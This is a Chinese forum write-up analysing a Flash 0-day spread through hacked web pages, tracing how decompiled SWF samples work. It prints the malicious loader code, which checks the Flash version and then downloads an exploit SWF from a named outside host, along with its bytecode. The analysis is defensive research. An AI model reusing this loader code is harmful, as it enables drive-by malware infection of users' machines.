By：racle

　　手记:

　　------------------------------------------

　　首先必须感谢的X.G.C.Team的OPEN在几个关键的地方给予我分析,解决办法的帮助.与及咱们论坛好几位兄弟的帮助.最终我才把这个东西给分析出来..

　　------------------------------------------

　　最近FLASH出了几个0DAY,论坛也帖了相关的新闻信息(请见:http://bbs.tian6.com/viewthread.php?tid=4434&extra=&page=1).我也约在5天前开始对此进行研究.我记得同时间邪恶八进制也有人开始同样的研究.到目前为止,该0DAY可以影响到90.115这个版本.而邪八那边的研究,先在两天前宣布成功完成.这又给我带来不小的压力..

　　(一)作为研究的初步,通过TIM的帮助,我从几个被挂马的页面得到2个SWF网马.反编译后得知这两个SWF在获得本地FLASH插件版本后,会再次下载2个真正具备溢出并且下载病毒到本地执行能力的恶意SWF文件.其验证和下载SWF文件的详细代码可见如下:

　　var fVersion = getVersion();

　　loadMovie("http://bao.5bao.net/123/" + fVersion + "i.swf", _root);

　　stop ();

　　------------------------------------此处获得了本地的FLASH版本.-------------------------------------

　　说明:加载外部文件命令loadMovie()可以在播放 SWF 文件的同时，将外部的 SWF 文件或 JPEG 文件加载到 Flash Player 中，使您可以同时显示几个 SWF 文件，或者在几个SWF 文件之间切换[local]1[/local]

　　1、loadMovie("url",target [, method])

　　"url" :要加载的 SWF 文件或 JPEG 文件的绝对路径或相对路径。

　　使用相对路径一般应将播放的.swf文件与要加载的.swf文件放在同一文件夹中。绝对 路径必须有详细的路径地址。

　　target：目标影片剪辑(mc元件）的名称和路径。目标影片剪辑将替换为加载的 SWF 文件或图像。

　　method 可选参数，一般可以不选。

　　// [Action in Frame 1]

　　_constantPool "fVersion" "/:$version" "http://xioayang,com/123/" "c.swf" "_root"

　　_push "fVersion" "/:$version"

　　_getVariable

　　_var

　　_push "http://xioayang,com/123/" "fVersion"

　　_getVariable

　　_add2

　　_push "c.swf"

　　_add2

　　_push "_root"

　　_getVariable

　　_getURL2 flag 64

　　_stop

　　_end

　　-------------------------获得版本后,构成下载地址,下载真正的凶手SWF.---------------------

　　Action in Frame 1这个动作就同时打开了C.swf并push in root了.

　　根据上面,我下载了相应的"WIN%209,0,45,0ie.swf"保存到本地,至此我们总共得到了4个样本SWF,其中2个溢出的主SWF.总算有了可供对比分析文件的资本了.

　　(二)反编译溢出主体SWF后,我们从FLA中看到了这个SWF包括3个标签,1个动作,1个图片元素,1个侦.

　　通过2进制对比我们的两个样本,发现具有可疑性的分别是图片元素和那个侦.邪恶八进制那里的研究认为是图片部分.并且最终锁定了图片中的一段代码.不过无论图片或者那个侦在16进下均为乱码.通过几个常用的SHELLCODE加密技术,我仍然无法还原出有用的信息..前几天我就是从这里开始失去方向的.部分代码截图可见: